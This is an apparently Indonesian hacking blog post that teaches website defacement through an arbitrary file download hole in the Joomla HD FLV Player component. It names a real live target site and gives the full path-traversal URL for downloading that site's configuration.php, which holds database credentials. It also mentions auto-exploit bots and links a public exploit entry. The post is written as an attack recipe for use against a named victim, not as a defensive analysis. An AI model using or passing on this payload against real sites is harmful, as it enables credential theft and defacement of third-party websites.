Deface Joomla HD FLV 2.1.0.1 ~ Arbitrary File Download Vulnerability

hallo everyone, kembali lagi bersama admin trolling system.

Back lagi ni, untuk share deface lagi, sebenarnya exploit ini udh lama.

Exploit: /components/com_hdflvplayer/hdflvplayer/download.php

Live Target: www.pratham.org

Di cara deface ini bisa mengambil file yang ada pada website target, contoh kita ingin mengambil file configuration.php nya

Selanjutnya, dengan cara menambahkan ../../../configuration.php

Maka http://www.pratham.org/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php

Ketika kita membukanya, otomatis file configuration.php nya terdownload dengan sendiri :D

Berikut isi file configuration nya

Kalau dengan memakai auto exploit, atau bot, bisa kok :D

Berikut gambarnya

Result config dengan memakai auto exploit

Exploit: https://www.exploit-db.com/exploits/35246

Ok sekian ya :D

Terima kasih sudah berkunjung :D

Contact admin >> http://trolling-system.net